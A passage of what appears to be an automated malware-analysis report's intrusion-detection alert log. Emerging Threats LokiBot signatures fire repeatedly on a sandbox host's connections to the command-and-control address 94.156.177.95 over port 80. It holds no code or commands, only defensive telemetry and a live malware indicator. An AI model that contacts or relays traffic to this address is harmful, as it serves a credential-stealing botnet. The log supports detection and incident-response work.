2024-11-15T18:15:02.623425+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:03.759207+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:04.924439+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:06.034036+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:07.183769+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:08.327887+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:09.444469+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:10.714557+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:11.839294+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:12.948556+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:14.079858+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:15.183719+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:16.283700+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:17.363462+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:18.468562+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:19.607161+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:20.770567+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:21.914705+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:23.029911+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:24.551139+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:25.761835+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:27.028960+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:28.161346+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:29.273083+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:30.400380+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:32.028611+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:33.186723+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:34.312997+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:35.454641+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:36.557201+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:37.893726+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:39.002081+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:40.095784+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:41.246344+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:42.358174+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:43.496054+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:44.609401+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:45.720877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:47.222539+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:48.320341+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:49.484132+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:51.299265+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:52.389939+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:53.531119+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:54.620846+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:55.779442+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:56.869263+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:58.000787+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:59.147535+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:16:00.270107+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:01.383166+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:02.497178+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50084	94.156.177.95	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:31.757247+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:32.891366+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:34.034011+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:35.159054+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:36.284393+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:37.443015+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:38.600814+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:39.761618+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:40.866807+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:42.016291+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:43.119045+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:44.288553+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:45.436270+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:46.563404+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:47.661088+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:48.863645+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:49.974935+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:51.170948+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:52.291246+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:53.435601+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:54.533464+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:56.696356+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:57.891299+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:58.995981+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:15:00.107047+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:01.275023+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:02.623425+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:03.759207+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:04.924439+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:06.034036+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:07.183769+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:08.327887+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:09.444469+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:10.714557+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:11.839294+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:12.948556+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:14.079858+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:15.183719+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:16.283700+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:17.363462+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:18.468562+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:19.607161+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:20.770567+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:21.914705+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:23.029911+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:24.551139+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:25.761835+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:27.028960+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:28.161346+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:29.273083+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:30.400380+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:32.028611+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:33.186723+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:34.312997+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:35.454641+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:36.557201+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:37.893726+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:39.002081+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:40.095784+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:41.246344+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:42.358174+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:43.496054+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:44.609401+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:45.720877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:47.222539+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:48.320341+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:49.484132+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:51.299265+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:52.389939+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:53.531119+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:54.620846+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:55.779442+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:56.869263+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:58.000787+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:59.147535+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:16:00.270107+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:01.383166+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:02.497178+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50084	94.156.177.95	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:28.588137+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.919895+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:33.059121+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.179211+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.327062+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.470587+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.613187+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.767433+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.915789+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:41.021819+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.169695+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.295006+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.446888+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.590810+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.714498+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.882051+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:49.034112+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:50.182971+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.319509+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.454053+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:53.594421+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.694505+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.897576+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:58.049519+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:59.161814+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.310997+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.433270+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.774194+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.942454+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:05.073942+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.199202+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.370279+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.480132+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.759213+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:10.869167+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:12.002434+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:13.104632+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.236003+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.349391+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.433713+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.538066+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.633126+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.765315+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.938967+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:22.075165+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.183308+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.806146+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:26.050868+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.207351+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.328661+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.444036+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.558346+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.185276+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.342990+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.461022+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.606842+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.942827+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:38.040556+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.160355+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.257744+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.402378+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.524040+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.648109+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.761342+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.883899+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.367955+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.523172+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.631500+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:51.452174+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.550655+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.681411+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.778594+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.941777+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:57.034588+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.148280+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.321996+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.432593+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.549900+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50084	94.156.177.95	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:28.588137+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.919895+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:33.059121+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.179211+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.327062+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.470587+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.613187+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.767433+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.915789+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:41.021819+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.169695+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.295006+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.446888+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.590810+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.714498+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.882051+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:49.034112+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:50.182971+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.319509+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.454053+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.95	80	TCP
